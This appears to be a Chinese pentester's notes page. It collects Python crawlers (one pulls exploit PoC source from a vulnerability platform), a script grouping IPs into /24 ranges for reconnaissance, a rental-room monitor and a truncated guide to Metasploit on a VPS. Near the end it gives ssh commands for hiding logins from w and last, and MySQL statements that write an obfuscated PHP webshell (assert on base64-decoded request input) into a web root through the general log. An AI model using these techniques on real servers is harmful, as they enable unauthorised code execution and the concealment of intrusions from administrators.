Bugcloud-POC

Bugcloud-POC

#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Created on Sat Apr 28 15:52:59 2018
@author: root
"""
import requests
import time
import datetime
import os
import re
import random
# Request headers sent with every API call.  Host, Referer and the session
# cookie are redacted ('****') in this listing; the cookie is a credential and
# belongs in an environment variable or config file, not in the script.
headers = dict([
    ('accept', 'application/json, text/plain, */*'),
    ('Host', '192.168.****'),
    ('Referer', 'http://192.168.****/'),
    ('cookie', '****'),
    ('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0'),
])
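def get_page(url):
    """Fetch *url* with the module-level ``headers`` and return the decoded JSON body.

    Returns ``None`` when the request fails, the server answers with a
    non-200 status, or the body is not JSON.  Failures are printed rather than
    raised, so callers must check for ``None`` before indexing the result.
    """
    try:
        # A bounded timeout keeps a stalled server from hanging the loop forever;
        # the original call had no timeout at all.
        response = requests.get(url, headers=headers, timeout=30)
    except requests.RequestException as e:
        # RequestException covers ConnectionError plus timeouts and other
        # transport failures the original `except ConnectionError` let escape.
        print('Error', e.args)
        return None
    if response.status_code != 200:
        # Previously this path fell off the end of the function silently.
        print('Error', 'unexpected status', response.status_code, url)
        return None
    try:
        return response.json()
    except ValueError as e:
        # requests raises a ValueError subclass when the body is not valid JSON.
        print('Error', e.args)
        return None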
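def mkdir(path):
    """Create directory *path* (with missing parents) if nothing exists there yet.

    Leading/trailing whitespace and a trailing backslash are stripped first,
    keeping the original Windows-oriented behaviour.  Prints "OK" and returns
    ``True`` when the directory was created; prints "False" and returns
    ``False`` when a file or directory already exists at that path.
    """
    path = path.strip().rstrip("\\")
    try:
        # Let the filesystem decide instead of exists() followed by makedirs():
        # that pair is racy when two runs share the same output tree.
        os.makedirs(path)
    except FileExistsError:
        print("False")
        return False
    print("OK")
    return True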
def validateTitle(title):
    """Return *title* with every character illegal in a Windows file name replaced by '_'."""
    # Characters Windows rejects in a file name: / \ : * ? " < > |
    illegal = re.compile(r"[\/\\\:\*\?\"\<\>\|]")
    return illegal.sub("_", title)
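def savefile(atype, aname, bugname, bugcode):
    """Append *bugcode* to ``<atype>/<aname>/<bugname>``, creating the directory first.

    All three path components come straight from the remote API response, so
    each must be a single plain name: a component containing a path separator
    or drive prefix, or equal to ``.``/``..``, raises ``ValueError`` instead of
    being joined into a path that could land outside the output tree.  The
    caller's ``except Exception`` logs such items and moves on.
    """
    for part in (atype, aname, bugname):
        if part in ("", ".", "..") or os.path.basename(part) != part:
            raise ValueError("unsafe path component: %r" % (part,))
    directory = os.path.join(atype, aname)
    mkdir(directory)
    print(directory)
    # os.path.join picks the platform separator; the original hard-coded '\\'.
    with open(os.path.join(directory, bugname), 'a+', encoding='utf-8') as f:
        f.write(bugcode)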
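if __name__ == '__main__':
    page = 0
    while True:
        page += 1
        url = "http://192.168.****/cloud/pluginvuln/?page=" + str(page)
        print(url)
        # Randomised pause between pages so the crawl does not hammer the host.
        time.sleep(random.randint(1, 10))
        json_dict = get_page(url)
        if not json_dict:
            # get_page() prints its own error and returns None; stop instead of
            # raising TypeError on json_dict['results'].
            break
        items = json_dict.get('results') or []
        if not items:
            # An empty page means the listing is exhausted; the original loop
            # never terminated.
            break
        for item in items:
            title = item['plugin']['title']
            code = item['plugin']['source_code']
            vtype = item['vtype']  # was `type`, which shadowed the builtin
            appname = item['fp_app_name']
            newtitle = validateTitle(title)
            try:
                savefile(str(vtype), str(appname), str(newtitle), code)
            except Exception as e:
                # Record the failed item (one per line, with the reason) and
                # keep going; one bad entry must not abort the whole crawl.
                content = str(vtype) + str(appname) + str(newtitle)
                with open("error.txt", 'a+', encoding='utf-8') as f:
                    f.write(content + '\t' + str(e) + '\n')
                continue
            print(title, vtype, appname)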

xiaoxiaofuli

APK–API

#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Created on Sat Apr 28 15:52:59 2018
@author: root
"""
import requests
import time
import datetime
import re
import random
# Request headers for the video API.  Note that the Host is a subdomain of
# ylgsrnzxlxpyb9cenfdfef6g.com, not of baidu.com, despite its prefix; the
# cookie value is a credential-like token and should not live in the script.
headers = dict([
    ('Accept-Language', 'zh-CN,zh;q=0.8'),
    ('Host', 'www.js.baidu.com.ylgsrnzxlxpyb9cenfdfef6g.com'),
    ('Accept-Encoding', 'gzip'),
    ('cookie', '__cfduid=dbc9ff34639e222aa9cc0eb395de4d41b1539066777'),
    ('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0'),
])
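def get_page(url):
    """Fetch *url* with the module-level ``headers`` and return the decoded JSON body.

    Returns ``None`` when the request fails, the server answers with a
    non-200 status, or the body is not JSON.  Failures are printed rather than
    raised, so callers must check for ``None`` before indexing the result.
    """
    try:
        # A bounded timeout keeps a stalled server from hanging the loop forever;
        # the original call had no timeout at all.
        response = requests.get(url, headers=headers, timeout=30)
    except requests.RequestException as e:
        # RequestException covers ConnectionError plus timeouts and other
        # transport failures the original `except ConnectionError` let escape.
        print('Error', e.args)
        return None
    if response.status_code != 200:
        # Previously this path fell off the end of the function silently.
        print('Error', 'unexpected status', response.status_code, url)
        return None
    try:
        return response.json()
    except ValueError as e:
        # requests raises a ValueError subclass when the body is not valid JSON.
        print('Error', e.args)
        return None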

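if __name__ == '__main__':
    page = 0
    while True:
        url = "http://www.js.baidu.com.ylgsrnzxlxpyb9cenfdfef6g.com/api/public/?service=Video.getNearby&uid=-1&lng=0.0&lat=0.0&p=" + str(page)
        # Randomised pause between pages so the crawl does not hammer the host.
        time.sleep(random.randint(1, 10))
        json_dict = get_page(url)
        print(page)
        page += 1
        if not json_dict:
            # get_page() prints its own error and returns None; stop instead of
            # raising TypeError on json_dict['data'].
            break
        items = json_dict['data']['info']
        if not items:
            # Empty page: the feed is exhausted.  The original loop never ended.
            break
        # One open per page instead of one per item, and one href per line --
        # the original concatenated them with no separator.
        with open("urlaaaaa.txt", 'a+', encoding='utf-8') as f:
            for item in items:
                f.write(item['href'] + '\n')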

SSH login history Hide

w和last命令内不显示登录痕迹

ssh -lroot 127.0.0.1 /usr/bin/bash  #登录之后直接调用bash

ssh -lroot 127.0.0.1 /usr/bin/ls   #登录之后直接调用命令

ssh -T root@127.0.0.1 /usr/bin/bash -i  # -T表示不分配伪终端 -i表示是交互式shell

查找登录痕迹

lsof -i:22 | grep EST

ps -ef | grep ssh

历史痕迹:

/var/log/secure
/var/log/auth.log

互联网资产搜集思路<更新中...>

给定域名、部分IP:

整理成C段IP,

#!/usr/bin/python
# -*- coding:utf-8 -*-
#exp:192.168.1.1 >>> 192.168.1.0/24
import ipaddress
import re

# def cleanCLRFspace(content):
# noCLContext = content.replace('\n','')
# noSpaceCLRFcontext = noCLContext.strip()
# return noSpaceCLRFcontext

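def readFile(path='./content.txt'):
    """Open the input text file and return the open file object.

    The caller owns the handle and must close it, e.g.
    ``with readFile() as ipf:``.  *path* defaults to the original hard-coded
    ``./content.txt``.
    """
    # Explicit encoding so the result does not depend on the locale of the
    # machine running the script.
    return open(path, 'r', encoding='utf-8')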

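def getLineIP(ipf):
    """Collect every dotted-quad IPv4 literal found in *ipf* into a set.

    *ipf* may be an open text file or any iterable of strings (one line each).
    Each octet is matched in full: the original pattern ended in a non-greedy
    ``\\d+?`` and so truncated ``10.0.0.123`` to ``10.0.0.1``.  Returns a
    ``set`` of the unique address strings; octet ranges are not validated.
    """
    ip_pattern = re.compile(r'\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b')
    found = set()
    for line in ipf:
        found.update(ip_pattern.findall(line))
    return found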


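def ip2c(ipNoDup):
    """Map each IPv4 address in *ipNoDup* to its /24 network.

    Returns the unique networks as ``'a.b.c.0/24'`` strings sorted
    numerically (``9.0.0.0/24`` before ``10.0.0.0/24``), not in the
    lexicographic order a plain string sort gives.  An entry that is not a
    valid IPv4 address raises ``ValueError`` (the original raised
    ``IndexError`` from an empty regex match).
    """
    # strict=False lets ip_network() zero the host bits for us.
    networks = {ipaddress.ip_network(ip + '/24', strict=False) for ip in ipNoDup}
    return [str(net) for net in sorted(networks)]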



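def saveContext(s, path='./result.txt'):
    """Write each string in *s* to *path* on its own line, overwriting the file.

    *path* defaults to the original hard-coded ``./result.txt``.  The file is
    opened in a ``with`` block so it is closed even if a write fails.
    """
    with open(path, 'w', encoding='utf-8') as wfile:
        wfile.writelines(i + '\n' for i in s)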

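if __name__ == '__main__':
    # readFile() hands ownership of the handle to the caller; the original
    # never closed it.
    with readFile() as ipf:
        ipList = getLineIP(ipf)
    saveContext(ip2c(ipList))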

Ziroom--Monitor

#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Created on Sat Apr 28 15:52:59 2018
@author: root
"""
import requests
import itchat
import time
import datetime
#itchat.auto_login()
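# A single login call carrying both options.  The original called
# auto_login() twice (once with hotReload, once with enableCmdQR); the second
# call is at best redundant and at worst a second QR prompt.  enableCmdQR=-1 is
# the value the original used for the command-line QR rendering.
itchat.auto_login(hotReload=True, enableCmdQR=-1)
#from urllib import request
url = "http://phoenix.ziroom.com/v7/room/detail.json?house_id=62947781&city_code=110000&id=61544148"
# Request headers for the room-detail endpoint.  The commented-out 'token'
# entry is an API credential; if it is ever needed again, load it from the
# environment rather than re-adding it here.
headers = {
    'accept': 'application/json;version=3',
    'Host': 'phoenix.ziroom.com',
    'Referer': 'https://hd.ziroom.com/2018/haiyan/index.html?citycode=110000',
    # 'token': 'd76a826e-bfb4-4421-902e-132418ebedfa',
    'User-Agent': 'okhttp/3.10.0',
}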
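def get_page(url):
    """Fetch *url* with the module-level ``headers`` and return the decoded JSON body.

    Returns ``None`` when the request fails, the server answers with a
    non-200 status, or the body is not JSON.  Failures are printed rather than
    raised, so callers must check for ``None`` before indexing the result.
    """
    try:
        # A bounded timeout keeps a stalled server from hanging the loop forever;
        # the original call had no timeout at all.
        response = requests.get(url, headers=headers, timeout=30)
    except requests.RequestException as e:
        # RequestException covers ConnectionError plus timeouts and other
        # transport failures the original `except ConnectionError` let escape.
        print('Error', e.args)
        return None
    if response.status_code != 200:
        # Previously this path fell off the end of the function silently.
        print('Error', 'unexpected status', response.status_code, url)
        return None
    try:
        return response.json()
    except ValueError as e:
        # requests raises a ValueError subclass when the body is not valid JSON.
        print('Error', e.args)
        return None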



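if __name__ == '__main__':
    n = 0
    while True:
        n += 1
        json_dict = get_page(url)
        nowTime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        if not json_dict:
            # get_page() already printed the error; wait and poll again rather
            # than crash on json_dict['data'] and stop monitoring.
            time.sleep(120)
            continue
        statuss = json_dict['data']['status']
        print("status:", statuss)
        if statuss == 'zxpzz':
            # Room still listed as "being renovated": poll again in six minutes.
            print("NOt Time!!!")
            itchat.send('<'+str(n)+'>'+'骚年~装修配置中>>>'+nowTime, toUserName='filehelper')
            time.sleep(360)
        else:
            # Any other status is treated as bookable; notify and poll faster.
            print("GOGOGOOGOOO!!!!!")
            itchat.send('<'+str(n)+'>'+'0o0o0o0~可以预定了--gogogogo>>>'+nowTime, toUserName='filehelper')
            time.sleep(120)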

MySQL's general-log shell

MySQL ROOT:

show variables like '%general%';
set global general_log='on';
SET global general_log_file='D:/phpStudy/WWW/cmd.php';
SELECT '<?php assert($_POST["cmd"]);?>';
SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['cmd']));?>";
set global general_log = off;

Frp结合VPS打造外网Metasploit


  • 前言:

本来一开始是在Vps上直接安装的MSF,想安装的可以试试,附一键脚本:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

chmod 755 msfinstall && ./msfinstall
|